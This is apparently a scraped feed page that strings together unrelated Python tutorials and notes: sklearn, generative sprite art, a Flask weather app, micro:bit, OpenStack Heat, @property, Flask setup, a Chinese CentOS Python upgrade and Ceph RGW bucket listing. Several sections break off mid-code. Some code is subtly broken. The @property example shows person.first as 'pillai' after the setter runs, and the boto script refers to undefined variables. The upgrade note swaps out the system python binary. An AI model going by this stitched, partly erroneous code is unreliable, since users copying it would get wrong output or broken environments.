What am I doing wrong? I essentially tried to apply the sklearn tutorial (They used some diabetes data set) to my own simple data. My data just contains the date, country A's % change in GDP for that specific year, and country B's % change in GDP for that same year.

I tried the solutions here and here (basically trying to find more out about the solution in the first link), but just receive the exact same error.

Here is the full traceback in case you want to see it:

Traceback (most recent call last): File "D:\My Stuff\Dropbox\python\Python projects\test regression\tester.py", line 34, in <module> regr.fit(chntrain, austrain) File "D:\Programs\Installed\Python34\lib\site-packages\sklearn\linear_model\base.py", line 376, in fit y_numeric=True, multi_output=True) File "D:\Programs\Installed\Python34\lib\site-packages\sklearn\utils\validation.py", line 454, in check_X_y check_consistent_length(X, y) File "D:\Programs\Installed\Python34\lib\site-packages\sklearn\utils\validation.py", line 174, in check_consistent_length "%s" % str(uniques)) ValueError: Found arrays with inconsistent numbers of samples: [ 1 107]
          How to Create Generative Art In Less Than 100 Lines Of Code      Cache   Translate Page      
What is generative art?

Generative art is the output of a system that makes its own decisions about the piece, rather than a human. The system could be as simple as a single python program, as long as it has rules and some aspect of randomness.

With programming, it’s pretty straightforward to come up with rules and constraints. That’s all conditional statements are. Having said that, finding ways to make these rules create something interesting can be tricky.


How to Create Generative Art In Less Than 100 Lines Of Code
Conway’s Game of Life (Labeled forreuse)

The Game of Life is a famous set of four simple rules that determine the “birth” and “death” of each cell in the system. Each of the rules play a part in advancing the system through each generation. Although the rules are simple and easy to understand, complex patterns quickly begin to emerge and ultimately form fascinating results.

Rules may be responsible for creating the foundation of something interesting, but even something as exciting as Conway’s Game of Life is predictable. Since the four rules are the determining factors for each generation, the way to produce unforeseeable results is to introduce randomization at the starting state of the cells. Beginning with a random matrix will make each execution unique without needing to change the rules.

The best examples of generative art are the ones that find a combination of predictability and randomness in order to create something interesting that is also statistically irreproducible .

Why should you tryit?

Not all side projects are created equal, and generative art may not be something you’re inclined to spend time on. If you decide to work on a project however, then you can expect these benefits:

Experience ― Generative art is just another opportunity to hone some new and old skills. It can serve as a gateway to practicing concepts like algorithms, data structures, and even new languages. Tangible Results ― In the programming world we rarely get to see any thing physical come out of our efforts, or at least I don’t. Right now I have a few posters in my living room displaying prints of my generative art and I love that programming is responsible for that. Attractive Projects ― We’ve all had the experience of explaining a personal project to someone, possibly even during an interview, without an easy way to convey the effort and results of the project. Generative art speaks for itself, and most anyone will be impressed by your creations, even if they can’t fully understand the methods. Where should youstart?

Getting started with generative art is the same process as any project, the most crucial step is to come up with an idea or find one to build upon. Once you have a goal in mind, then you can start working on the technology required to achieve it.

Most of my generative art projects have been accomplished in Python. It’s a fairly easy language to get used to and it has some incredible packages available to help with image manipulation, such as Pillow .

Luckily for you, there’s no need to search very far for a starting point, because I’ve provided some code down below for you to play with.

Sprite Generator

This project started when I saw a post showing off a sprite generator written in javascript. The program created 5x5 pixel art sprites with some random color options and its output resembled multi-colored space invaders.

I knew that I wanted to practice image manipulation in Python, so I figured I could just try to recreate this concept on my own. Additionally, I thought that I could expand on it since the original project was so limited in the size of the sprites. I wanted to be able to specify not only the size, but also the number of them and even the size of the image.

Here’s a look at two different outputs from the solution I ended up with:


How to Create Generative Art In Less Than 100 Lines Of Code
7x7 30 1900
How to Create Generative Art In Less Than 100 Lines Of Code
43x43 6 1900

These two images don’t resemble each other at all, but they’re both the results of the same system. Not to mention, due to the complexity of the image and the randomness of the sprite generation, there is an extremely high probability that even with the same arguments, these images will forever be one of a kind. I love it.

The environment

If you want to start playing around with the sprite generator, there’s a little foundation work that has to be done first.

Setting up a proper environment with Python can be tricky. If you haven’t worked with Python before, you’ll probably need to download Python 2.7.10. I initially had trouble setting up the environment, so if you start running into problems, you can do what I did and look into virtual environments . Last but not least, make sure you have Pillow installed as well.

Once you have the environment set up, you can copy my code into a file with extension.py and execute with the following command:

python spritething.py [SPRITE_DIMENSIONS] [NUMBER] [IMAGE_SIZE]

For example, the command to create the first matrix of sprites from above would be:

python spritething.py 7 30 1900 The code import PIL, random, sys from PIL import Image, ImageDraw origDimension = 1500 r = lambda: random.randint(50,215) rc = lambda: (r(), r(), r()) listSym = [] def create_square(border, draw, randColor, element, size): if (element == int(size/2)): draw.rectangle(border, randColor) elif (len(listSym) == element+1): draw.rectangle(border,listSym.pop()) else: listSym.append(randColor) draw.rectangle(border, randColor) def create_invader(border, draw, size): x0, y0, x1, y1 = border squareSize = (x1-x0)/size randColors = [rc(), rc(), rc(), (0,0,0), (0,0,0), (0,0,0)] i = 1 for y in range(0, size): i *= -1 element = 0 for x in range(0, size): topLeftX = x*squareSize + x0 topLeftY = y*squareSize + y0 botRightX = topLeftX + squareSize botRightY = topLeftY + squareSize create_square((topLeftX, topLeftY, botRightX, botRightY), draw, random.choice(randColors), element, size) if (element == int(size/2) or element == 0): i *= -1; element += i def main(size, invaders, imgSize): origDimension = imgSize origImage = Image.new('RGB', (origDimension, origDimension)) draw = ImageDraw.Draw(origImage) invaderSize = origDimension/invaders padding = invaderSize/size for x in range(0, invaders): for y in range(0, invaders): topLeftX = x*invaderSize + padding/2 topLeftY = y*invaderSize + padding/2 botRightX = topLeftX + invaderSize - padding botRightY = topLeftY + invaderSize - padding create_invader((topLeftX, topLeftY, botRightX, botRightY
          How to build a web app using Python’s Flask and Google App Engine      Cache   Translate Page      

How to build a web app using Python’s Flask and Google App Engine

If you want to build web apps in a very short amount of time using python, then Flask is a fantastic option.

Flask is a small and powerful web framework (also known as “ microframework ”). It is also very easy to learn and simple to code. Based on my personal experience, it was easy to start as a beginner.

Before this project, my knowledge of Python was mostly limited to Data Science. Yet, I was able to build this app and create this tutorial in just a few hours.

In this tutorial, I’ll show you how to build a simple weather app with some dynamic content using an API. This tutorial is a great starting point for beginners. You will learn to build dynamic content from APIs and deploying it on Google Cloud.

The end product can be viewed here .


How to build a web app using Python’s Flask and Google App Engine
How to build a web app using Python’s Flask and Google App Engine

To create a weather app, we will need to request an API key from Open Weather Map . The free version allows up to 60 calls per minute, which is more than enough for this app. The Open Weather Map conditions icons are not very pretty. We will replace them with some of the 200+ weather icons from Erik Flowers instead.


How to build a web app using Python’s Flask and Google App Engine

This tutorial will also cover: (1) basic CSS design, (2) basic HTML with Jinja, and (3) deploying a Flask app on Google Cloud.

The steps we’ll take are listed below:

Step 0: Installing Flask (this tutorial doesn’t cover Python and PIP installation) Step 1: Building the App structure Step 2: Creating the Main App code with the API request Step 3: Creating the 2 pages for the App (Main and Result) with Jinja , HTML, and CSS Step 4: Deploying and testing on your local laptop Step 5: Deploying on Google Cloud. Step 0 ― Installing Flask and the libraries we will use in a virtual environment.

We’ll build this project using a virtual environment. But why do we need one?

With virtual environments, you create a local environment specific for each projects. You can choose libraries you want to use without impacting your laptop environment. As you code more projects on your laptop, each project will need different libraries. With a different virtual environment for each project, you won’t have conflicts between your system and your projects or between projects.

Run Command Prompt (cmd.exe) with administrator privileges. Not using admin privileges will prevent you from using pip.
How to build a web app using Python’s Flask and Google App Engine
(Optional) Install virtualenv and virtualenvwrapper-win with PIP. If you already have these system libraries, please jump to the next step. #Optional pip install virtualenvwrapper-win pip install virtualenv
How to build a web app using Python’s Flask and Google App Engine
Create your folder with the name “WeatherApp” and make a virtual environment with the name “venv” (it can take a bit of time) #Mandatory mkdir WeatherApp cd WeatherApp virtualenv venv
How to build a web app using Python’s Flask and Google App Engine
Activate your virtual environment with “call” on windows (same as “source” for linux). This step changes your environment from the system to the project local environment. call venv\Scripts\activate.bat
How to build a web app using Python’s Flask and Google App Engine
Create a requirements.txt file that includes Flask and the other libraries we will need in your WeatherApp folder, then save the file. The requirements file is a great tool to also keep track of the libraries you are using in your project. Flask==0.12.3
click==6.7
gunicorn==19.7.1
itsdangerous==0.24
Jinja2==2.9.6
MarkupSafe==1.0
pytz==2017.2
requests==2.13.0
Werkzeug==0.12.1
How to build a web app using Python’s Flask and Google App Engine
Install the requirements and their dependencies. You are now ready to build your WeatherApp. This is the final step to create your local environment. pip install -r requirements.txt
How to build a web app using Python’s Flask and Google App Engine
Step 1 ― Building the App structure

You have taken care of the local environment. You can now focus on developing your application. This step is to make sure the proper folder and file structure is in place. The next step will take care of the backend code.

Create two Python files (main.py, weather.py) and two folders (static with a subfolder img, templates).
How to build a web app using Python’s Flask and Google App Engine
Step 2 ― Creating the Main App code with the API request (Backend)

With the structure set up, you can start coding the backend of your application. Flask’s “Hello world” example only uses one Python file. This tutorial uses two files to get you comfortable with importing functions to your main app.

The main.py is the server that routes the user to the homepage and to the result page. The weather.py file creates a function with API that retrieves the weather data based on the city selected. The function populates the resulting page.

Edit main.py with the following code and save #!/usr/bin/env python from pprint import pprint as pp from flask import Flask, flash, redirect, render_template, request, url_for from weather import query_api app = Flask(__name__) @app.route('/')
def index():
return render_template(
'weather.html',
data=[{'name':'Toronto'}, {'name':'Montreal'}, {'name':'Calgary'},
{'name':'Ottawa'}, {'name':'Edmonton'}, {'name':'Mississauga'},
{'name':'Winnipeg'}, {'name':'Vancouver'}, {'name':'Brampton'},
{'name':'Quebec'}]) @app.route("/result" , methods=['GET', 'POST'])
def result():
data = []
error = None
select = request.form.get('comp_select')
resp = query_api(select)
pp(resp)
if resp:
data.append(resp)
if len(data) != 2:
error = 'Bad Response from Weather API'
return render_template(
'result.html',
data=data,
error=error) if __name__=='__main__': app.run(debug=True) Request a free API key on Open Weather Map
How to build a web app using Python’s Flask and Google App Engine
Edit weather.py with the following code (updating the API_KEY) and save from datetime import datetime
import os
import pytz
import requests
import math
API_KEY = 'XXXXXXXXXXXXXXXXXXXXXXXXXXX'
API_URL = ('http://api.openweathermap.org/data/2.5/weather?q={}&mode=json&units=metric&appid={}') def query_api(city): try: print(API_URL.format(city, API_KEY)) data = requests.get(API_URL.format(city, API_KEY)).json() except Exception as exc: print(exc) data = None return data Step 3 ― Creating pages with Jinja , HTML, and CSS (Frontend)

This step is about creating what the user will see.

The HTML pages weather and result are the one the backend main.py will route to and give the visual structure. The CSS file will bring the final touch. There is no javascript in this tutorial (the front end is pure HTML and CSS).

It was my first time using the Jinja2 template library to populate the HTML file. It surprised me how easy it was to bring dynamic images or use functions (e.g. rounding weather). Definitely a fantastic template engine.

Create the first HTML file in the templates folder (weather.html) <!doctype html> <link rel="stylesheet" type="text/css" href="{{ url_for('static', filename='style.css') }}"> <div class="center-on-page"> <h1>Weather in a City</h1> <form class="form-inline" method="POST" action="{{ url_for('result') }}"> <div class="select"> <select name="comp_select" class="selectpicker form-control"> {% for o in data %} <option value="{{ o.name }}">{{ o.name }}</option> {% endfor %} </select> </div> <button type="submit" class="btn">Go</button> </form> Create the second HTML file in the templates folder (result.html) <!doctype html> <link rel="stylesheet" type="text/css" href="{{ url_for('static', filename='style.css') }}"> <div class="center-on-page"> {% for d in data %} {% set my_string = "static/img/" + d['weather'][0]['icon']+ ".svg" %} <h1> <img src="{{ my_string }}" class="svg" fill="white" height="100" vertical-align="middle" width="100"> </h1> <h1>Weather</h1> <h1>{{ d['name'] }}, {{ d['sys']['country'] }}</h1> <h1>{{ d['main']['temp']|round|int}} °C</h1> {% endfor %}
How to build a web app using Python’s Flask and Google App Engine
Add a CSS file in the static folder (style.css) body { color: #161616; font-family: 'Roboto', sans-serif; text-align: center; background-color: currentColor; } .center-on-page { position: absolute; top:50%; left: 50%; transform: translate(-50%,-50%); } h1 { text-align: center; color:#FFFFFF; } img { vertical-align: middle; } /* Reset Select */ select { -webkit-appearance: none; -moz-appearance: none; -ms-appearance: none; appearance: none; outline: 0; box-shadow: none; border: 0 !important; background: #2c3e50; background-image: none; } /* Custom Select */ .select { position: relative; display: block; width: 20em; height: 3em; line-height: 3; background: #2c3e50; overflow: hidden; border-radius: .25em; } select { width: 100%; height: 100%; margin: 0; padding: 0 0 0 .5em; color: #fff; cursor: pointer; } select::-ms-expand { display: none; } /* Arrow */ .select::after { content: '\25BC'; position: absolute; top: 0; right: 0; bottom: 0; padding: 0 1em; background: #34495e; pointer-events: none; } /* Transition */ .select:hover::after { color: #f39c12; } .select::after { -webkit-transition: .25s all ease; -o-transition: .25s all ease; transition: .25s all ease; } button{ -webkit-appearance: none; -moz-appearance: none; -ms-appearance: none; appearance: none; outline: 0; box-shadow: none; border: 0 !important; background: #2c3e50; background-image: none; width: 100%; height: 40px; margin: 0; margin-top: 20px; color: #fff; cursor: pointer; border-radius: .25em; } .button:hover{ color: #f39c12; } Download the images in the img subfolder in static

Link with the images on Github :


How to build a web app using Python’s Flask and Google App Engine
How to build a web app using Python’s Flask and Google App Engine
Step 4 ― Deploying and testinglocally

At this stage, you have set up the environment, the structure, the backend, and the frontend. The only thing left is to launch your app and to enjoy it on your localhost.

Just launch the main.py with Python python main.py Go to the localhost link proposed on cmd with your Web Browser (Chrome, Mozilla, etc.). You should see your new weather app live on your local laptop:)
How to build a web app using Python’s Flask and Google App Engine
How to build a web app using Python’s Flask and Google App Engine
Step 5 ― Deploying on GoogleCloud

This last step is for sharing your app with the world. It’s important to note that there are plenty of providers for web apps built using Flask. Google Cloud is just one of many. This article does not cover some of the others like AWS, Azure, Heroku…

If the community is interested, I can provide the steps of the other cloud providers in another article and some comparison (pricing, limitations, etc.).

To deploy your app on Google Cloud you will need to 1) Install the SDK, 2) Create a new project, 3) Create 3 local files, 4) Deploy and test online.

Install the SDK following Google’s instructions Connect to your Google Cloud Account (use a $300 coupon if you haven’t already) Create a new project and save the project id (wait a bit until the new project is provisioned)
How to build a web app using Python’s Flask and Google App Engine
How to build a web app using Python’s Flask and Google App Engine
Create an app.yaml file in your main folder with the following code: runtime: python27 api_version: 1 threadsafe: true handlers: - url: /static static_dir: static - url: /.* script: main.app libraries: - name: ssl version: latest Create an appengine_config.py file in your main folder with the following code: from google.appengine.ext import vendor
          Micro:bit uPython: Pausing the program execution      Cache   Translate Page      

In this short tutorial we will check how we can pause the execution of a program on the Micro:bit , running Micropython.

Introduction

In this short tutorial we will check how we can pause the execution of a program on the Micro:bit , running MicroPython.

In order to be able to pause the execution, we will use the sleep function of the microbit module. This function receives as input the number of milliseconds to pause the execution.

In our simple example, we will do a loop and print the current iteration value, waiting one second at the end of each iteration.

The code

As mentioned before, the sleep function is available on the microbit module. So, we need to import the function first, before using it.

from microbit import sleep

After that, we will specify our loop. We will do a simple for in loop between 0 and 9. We will use the range function to generate the list of numbers between 0 and 9 and iterate through each number of the list.

Note that the range function receives as first parameter the starting value of the list (included) and as second input the last number of the list (not included). This is why we use 10 as second argument of the range function, to generate the numbers between 0 and 9.

for i in range(0, 10): #loop body

Then, inside the loop, we will simply print the current value and then pause the execution for 1 second. Since the sleep function receives the time in milliseconds, we need to pass to it the value 1000.

print (i) sleep(1000)

The final code can be seen below.

from microbit import sleep for i in range(0, 10): print (i) sleep(1000) Testing the code

To test the code, simply upload the previous script to your Micro:bit board using a tool of your choice. In my case, I’m using uPyCraft , a MicroPython IDE.

After running the program, you should get an output similar to figure 1, which shows the numbers getting printed. During the program execution, there should be a 1 second delay between each print.


Micro:bit uPython: Pausing the program execution

Figure 1 Output of the program.


          OpenStack: Heat Python Tutorial      Cache   Translate Page      

In this tutorial, we’ll focus on how to interact with OpenStack Heat using python. Before deep diving into Heat Python examples, I suggest being familiar with Heat itself and more specifically:

Templates Basic operations: create/delete/update stack

Still here? let’s go

Set up Heat client

In order to work with Heat, we need first to create a heat client.

from heatclient import client as heat_client from keystoneauth1 import loading from keystoneauth1 import session kwargs = { ‘auth_url’: <YOUR_AUTH_URL>, ‘username’:<YOUR_USERNAME>, ‘password’: <YOUR_PASSWORD>, ‘project_name’: <YOUR_PROJECT_NAME>, ‘user_domain_name’: <YOUR_USER_DOMAIN_NAME>, ‘project_domain_name’: <YOUR_PROJECT_DOMAIN_NAME> } loader = loading.get_plugin_loader(‘password’) auth = loader.load_from_options(**kwargs) sess = session.Session(auth=auth, verify=False) client = heat_client.Client(‘1′, session=sess, endpoint_type=’public’, service_type=’orchestration’)

Note: if for some reason you are using auth v2 and not v3, you can drop user_domain_name and project_domain_name.

You should be able to use your heat client now. Let’s test it.

List Stacks

for stack in client.stacks.list():

print(stack)

Stack {

u’description’ : u” ,

u’parent’ : None ,

u’deletion_time’ : None ,

u’stack_name’ : u’default’ ,

u’stack_user_project_id’ : u’48babe632349f9b87ac3513′ ,

u’stack_status_reason’ : u’StackCREATEcompletedsuccessfully’ ,

u’creation_time’ : u’2018-10-25T17 : 02 : 52 Z’ ,

u’links’ : [

{

u’href’ : u’https : //my-server’ ,

u’rel’ : u’self’

}

] ,

u’updated_time’ : None ,

u’stack_owner’ : None ,

u’stack_status’ : u’CREATE_COMPLETE’ ,

u’id’ : u’b90d0e57-05a8-4700-b2f9-905497abe673′ ,

u’tags’ : None

}

>

The list method provides us with a generator that returns Stack objects. Each Stack object contains plenty of information. Information like the name of the stack, if it’s a nested stack you’ll get details on the parent stack, creation time and probably the most useful one stack status which allows us to check if the stack is ready to use.

Create a Stack

In order to create a stack, we first need a template that will define how our stack would look like. I’m going to assume here that you read the template guide and you have a basic (or complex) template ready for use.

To load a template, heat developers have provided us with the get_template_content method

from heatclient.common import template_utils import yaml template_path = ‘/home/mario/my_template’ # Load the template _files, template = template_utils.get_template_contents(template_path) # Searlize it into a stream s_template = yaml.safe_dump(template) client.stacks.create(stack_name=’my_stack’, template = s_template) Stack with parameters

In reality, there is a good chance your template includes several parameters that you have to pass when creating the stack. For example, take a look at this template

heat_template_version: 2013-05-23 description: My Awesome Stack parameters: flavor: type: string image: type: string

In order for the stack creation to be completed successfully, we need to provide the parameters flavor and image . This will require a slight change in our code

parameters = {‘flavor’: ‘m1.large’, ‘image’: ‘Fedora-30′} client.stacks.create(stack_name=’my_stack’, template = s_template, parameters=parameters)

We created a dictionary with the required parameters and passed it to the stack create method. When more parameters added to your template, all you need to do is to extend the ‘parameters’ dictionary, without modifying the create call.

Inspect stack resources

Inspecting the stack as we previously did, might not be enough in certain scenarios. Imagine you want to use some resources as soon as they ready, regardless of overall stack readiness. In that case, you’ll want to check what is the status of a single resource. The following code will allow you to achieve that

stack = client.stacks.get(“my_stack”) res = client.resources.get(stack_id, ‘fip’) if res.resource_status == ‘CREATE_COMPLETE’: print(“You may proceed :)”)

So what did just happened? first, we need to obtain the ID of our stack. In order to do that we use the stacks get method by passing our stack’s name.

Now that we have the stack ID we can use it and the resource name we are interested in (‘f
          Python @Property Explained A Simplified Guide      Cache   Translate Page      

A python @property decorator lets a method to be accessed as an attribute instead of as a method with a '()' . Today, you will gain an understanding of why is it really needed, in what situations you can use it and how to actually use it.

Contents

2. When to use @property?

3. The setter method When to use it and How to define one? 1. Introduction

In well-written python code, you might have noticed a @property decorator just before the method definition. In this guide, you will understand clearly what exactly the python @property does, when to use it and how to use it. This guide, however, assumes that you have a basic idea about what python classes are. Because the @property is typically used inside one.

So, what does the @property do?

The @property lets a method to be accessed as an attribute instead of as a method with a '()' . But why is it really needed and in what situations can you use it?

To understand this, let’s create a Person class that contains the first , last and fullname of the person as attributes and has an email() method that provides the person’s email.

class Person(): def __init__(self, firstname, lastname): self.first = firstname self.last = lastname self.fullname = self.first + ' '+ self.last def email(self): return '{}.{}@email.com'.format(self.first, self.last)

Let’s create an instance of the Person ‘selva prabhakaran’ and print the attributes.

# Create a Person object person = Person('selva', 'prabhakaran') print(person.first) #> selva print(person.last) #> prabhakaran print(person.fullname) #> selva prabhakaran print(person.email()) #> <a href="/cdn-cgi/l/email-protection" data-cfemail="2c5f49405a4d025c5e4d4e444d474d5e4d426c49414d4540024f4341">[email protected]</a> 2. When to use @property?

So far so good.

Now, somehow you decide to change the last name of the person.

Here is a fun fact about python classes: If you change the value of an attribute inside a class, the other attributes that are derived from the attribute you just changed don’t automatically update.

For example: By changing the self.last name you might expect the self.full attribute, which is derived from self.last to update. But unexpectedly it doesn’t. This can provide potentially misleading information about the person .

However, notice the email() works as intended, eventhough it is derived from self.last .

# Changing the `last` name does not change `self.full` name, but email() works person.last = 'prasanna' print(person.last) #> prasanna print(person.fullname) #> selva prabhakaran print(person.email()) #> <a href="/cdn-cgi/l/email-protection" data-cfemail="6013050c16014e10120113010e0e0120050d01090c4e030f0d">[email protected]</a>

So, a probable solution would be to convert the self.fullname attribute to a fullname() method , so it will provide correct value like the email() method did. Let’s do it.

# Converting fullname to a method provides the right fullname # But it breaks old code that used the fullname attribute without the `()` class Person(): def __init__(self, firstname, lastname): self.first = firstname self.last = lastname def fullname(self): return self.first + ' '+ self.last def email(self): return '{}.{}@email.com'.format(self.first, self.last) person = Person('selva', 'prabhakaran') print(person.fullname()) #> selva prabhakaran # change last name to Prasanna person.last = 'prasanna' print(person.fullname()) #> selva prasanna

Now the convert to method solution works.

But there is a problem.

Since we are using person.fullname() method with a '()' instead of person.fullname as attribute, it will break whatever code that used the self.fullname attribute. If you are building a product/tool, the chances are, other developers and users of your module used it at some point and all their code will break as well.

So a better solution (without breaking your user’s code) is to convert the method as a property by adding a @property decorator before the method’s definition. By doing this, the fullname() method can be accessed as an attribute instead of as a method with '()' . See example below.

# Adding @property provides the right fullname and does not break code! class Person(): def __init__(self, firstname, lastname): self.first = firstname self.last = lastname @property def fullname(self): return self.first + ' '+ self.last def email(self): return '{}.{}@email.com'.format(self.first, self.last) # Init a Person person = Person('selva', 'prabhakaran') print(person.fullname) #> selva prabhakaran # Change last name to Prasanna person.last = 'prasanna' # Print fullname print(person.fullname) # selva prasanna 3. The setter method When to use it and How to define one?

Now you are able to access the fullname like an attribute.

However there is one final problem.

Your users are going to want to change the fullname property at some point. And by setting it, they expect it will change the values of the first and last names from which fullname was derived in the first place.

But unfortunately, trying to set the value of fullname throws an AttributeError .

person.fullname = 'raja rajan' #> --------------------------------------------------------------------------- #> AttributeError Traceback (most recent call last) #> <ipython-input-36-67cde7461cfc> in <module> #> ----> 1 person.fullname = 'raja rajan' #> AttributeError: can't set attribute

How to tackle this?

We define an equivalent setter method that will be called everytime a user sets a value to this property.

Inside this setter method, you can modify the values of variables that should be changed when the value of fullname is set/changed.

However, there are a couple of conventions you need to follow when defining a setter method:

@property

Finally you need to add a @{methodname}.setter decorator just before the method definition.

Once you add the @{methodname}.setter decorator to it, this method will be called everytime the property ( fullname in this case) is set or changed. See below.

class Person(): def __init__(self, firstname, lastname): self.first = firstname self.last = lastname @property def fullname(self): return self.first + ' '+ self.last @fullname.setter def fullname(self, name): firstname, lastname = name.split() self.first = firstname self.last = lastname def email(self): return '{}.{}@email.com'.format(self.first, self.last) # Init a Person person = Person('selva', 'prabhakaran') print(person.fullname) #> selva prabhakaran print(person.first) #> selva print(person.last) #> prabhakaran # Setting fullname calls the setter method and updates person.first and person.last person.fullname = 'velu pillai' # Print the changed values of `first` and `last` print(person.fullname) #> velu pillai print(person.first) #> pillai print(person.last) #> pillai

There you go. We set a new value to person.fullname , the person.first and person.last updated as well. Our Person class will now automatically update the derived attributes (property) when one of the base attribute changes and vice versa.

4. Conclusion

Hope the purpose of @property is clear and you now know when and how to use it. If you did, congratulations! I will meet you in the next one.


          Install Flask and create your first web application      Cache   Translate Page      

There are ton of python web frameworks and Flask is one of them but it is not a full stack web framework.

It is “a microframework for Python based on Werkzeug , Jinja 2 and good intentions.” Includes a built-in development server, unit tesing support, and is fully Unicode-enabled with RESTful request dispatching and WSGI compliance .

Installation

To install flask you can go here or just follow below steps:

Step1: Install virtual environment

If you are using Python3 than you don't have to install virtual environment because it already come with venv module to create virtual environments.

If you are using Python 2, the venv module is not available. Instead, install virtualenv .

On linux, virtualenv is provided by your package manager:

//Debian, Ubuntu $ sudo apt-get install python-virtualenv //CentOS, Fedora $ sudo yum install python-virtualenv //Arch $ sudo pacman -S python-virtualenv

If you are on Mac OS X or windows, download get-pip.py , then:

$ sudo python2 Downloads/get-pip.py $ sudo python2 -m pip install virtualenv

On Windows, as an administrator:

\Python27\python.exe Downloads\get-pip.py \Python27\python.exe -m pip install virtualenv Step 2: Create an environment

Create a project folder and a venv folder within:

mkdir myproject cd myproject python3 -m venv venv
Install Flask and create your first web application

On Windows:

py -3 -m venv venv

If you needed to install virtualenv because you are on an older version of Python, use the following command instead:

virtualenv venv

On Windows:

\Python27\Scripts\virtualenv.exe venv Activate the environment

Before you work on your project, activate the corresponding environment:

. venv/bin/activate
Install Flask and create your first web application

On Windows:

venv\Scripts\activate

Your shell prompt will change to show the name of the activated environment.

Step 3: Install Flask

Within the activated environment, use the following command to install Flask:

$ pip install Flask
Install Flask and create your first web application

Flask is now installed:Check out the Quickstart or go to the Documentation .

Create a applcation

So, let's build the most simplest hello world application.

Follow these steps:

As, you are already present in the myproject folder. Create a file `hello.py' and write the below code.

Import the Flask class. An instance of this class will be our WSGI application.

from flask import Flask

Next we create an instance of this class. The first argument is the name of the application’s module or package. If you are using a single module (as in this example), you should use name because depending on if it’s started as application or imported as module the name will be different (' main ' versus the actual import name). This is needed so that Flask knows where to look for templates, static files, and so on.

app = Flask(__name__)

We then use the route() decorator to tell Flask what URL should trigger our function.The function is given a name which is also used to generate URLs for that particular function, and returns the message we want to display in the user’s browser.

@app.route('/') def hello_world(): return 'Hello, World!'

Make sure to not call your application flask.py because this would conflict with Flask itself.

To run the application you can either use the flask command or python’s -m switch with Flask. Before you can do that you need to tell your terminal the application to work with by exporting the FLASK_APP environment variable:

$ export FLASK_APP=hello.py $ flask run //Or you can use $ export FLASK_APP=hello.py $ python -m flask run
Install Flask and create your first web application
Go to http://127.0.0.1:5000/ to see your project running.
Install Flask and create your first web application

Check out my blog: SourceAI


          python2.7.5升级到python      Cache   Translate Page      

闲来没事,虚拟机中装好CentOS7,然而其自带的py版本为2.7.5,准备升级到最新版,于是写下来分享出来,或许有同志用得着。

1、下载最新版py:

wget https://www.python.org/ftp/python/3.7.1/Python-3.7.1.tgz

2、解压

tar -zxvf Python-3.7.1.tgz

3、进入解压目录

cd Python-3.7.1

4、创建安装目录

mkdir /usr/local/python-3.7.1 5、编译
./configure --prefix=/usr/local/python-3.7.1

注意坑,若提示:no acceptable C compiler found in $PATH,请确保是否装好了编译环境,没装的话执行:yum install gcc安装gcc。

6、安装:

make && make install

注意坑,若提示:zipimport.ZipImportError: can’t decompress data; zlib not available,请执行:yum -y install zlib*安装zlib。

若提示:ModuleNotFoundError: No module named '_ctypes',请执行: yum install libffi-devel -y安装libffi-devel。

7、备份原有python:

mv /usr/bin/python /usr/bin/python.bak

8、创建软连接

ln -s /usr/local/python-3.7.1/bin/python-3.7 /usr/bin/python

恭喜,如果一切顺利,应该是升级成功了吧!祝你好运!

标签:python py


          ceph-rgw-delimiter-and-nextmarker      Cache   Translate Page      

ceph rgw的list-bucket接口默认只返回前面1000个object,对于大于1000个object的场景,在第一次请求的response中会有下面两个参数来指示获取下一个1000个object,类似分页:

/ list-bucket的delimiter问题复现及解决 使用boto执行list-bucket

脚本如下:

import boto from boto.s3.connection import S3Connection import datetime import sys reload(sys) sys.setdefaultencoding('utf-8') # get config from environment or ... endpoint = os.environ["s3_endpoint"] bucket_name = "hdg2-gcp-bossweb" access_key = os.environ["access_key"] secret_key = os.environ["secret_key"] conn = S3Connection(ak, sk, host=host, calling_format=boto.s3.connection.OrdinaryCallingFormat(), is_secure=False) #print conn.get_all_buckets() bucket = conn.get_bucket(bucketname) marker="" while True: filelist = bucket.get_all_keys(marker=marker) for file in filelist: print("%s\t%s\t%s" %(file.last_modified, file.name, file.size)) if filelist.is_truncated == False: break marker = filelist.next_marker print(marker)

抓包请求:


ceph-rgw-delimiter-and-nextmarker

响应如下:

<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/"> <Name>hdg2-gcp-bossweb</Name> <Prefix /> <Marker /> <MaxKeys>1000</MaxKeys> <IsTruncated>true</IsTruncated> <EncodingType>url</EncodingType> <Contents> <Key>bosswebfiles%2Fattachment%2F1495115517299a0165c74-4ca4-4c2f-9d66-2e89fbaeef8c.jpg</Key> <LastModified>2017-05-18T13:51:57.000Z</LastModified> <ETag>"50d0c18045f9b92ae52a66cf4d82701b"</ETag> <Size>402987</Size> <StorageClass>STANDARD</StorageClass> <Owner> <ID>p-gcp</ID> <DisplayName>p-gcp</DisplayName> </Owner> </Contents> ... <Contents> <Key>bosswebfiles%2Fattachment%2F152828637501198245d2a-e1a4-46e6-9502-648959a7045a.jpg</Key> <LastModified>2018-06-06T11:59:35.000Z</LastModified> <ETag>"7cbcd767f1a282f48b6ed0f7ec2f4fa2"</ETag> <Size>160286</Size> <StorageClass>STANDARD</StorageClass> <Owner> <ID>p-gcp</ID> <DisplayName>p-gcp</DisplayName> </Owner> </Contents> </ListBucketResult>

总结: 没有指定delimiter表示直接按照object的key输出,不人为构建目录层级 marker为空表示从第一个object开始 Response的IsTruncated的值为True表示不是最后一页 Response中却没有NextMarker这一属性,故而无法获取下一页的object 使用s3cmd尝试 访问顶级目录

请求如下


ceph-rgw-delimiter-and-nextmarker

响应如下:

<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/"> <Name>hdg2-gcp-bossweb</Name> <Prefix /> <Marker /> <MaxKeys>1000</MaxKeys> <Delimiter>/</Delimiter> <IsTruncated>false</IsTruncated> <CommonPrefixes> <Prefix>bosswebfiles/</Prefix> </CommonPrefixes> </ListBucketResult>

总结: / s3cmd访问子目录

请求如下:


ceph-rgw-delimiter-and-nextmarker

响应如下:

<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/"> <Name>hdg2-gcp-bossweb</Name> <Prefix>bosswebfiles/</Prefix> <Marker /> <MaxKeys>1000</MaxKeys> <Delimiter>/</Delimiter> <IsTruncated>false</IsTruncated> <CommonPrefixes> <Prefix>bosswebfiles/attachment/</Prefix> </CommonPrefixes> </ListBucketResult>

总结: / s3cmd访问文件所在目录

请求如下:


ceph-rgw-delimiter-and-nextmarker

部分响应如下:

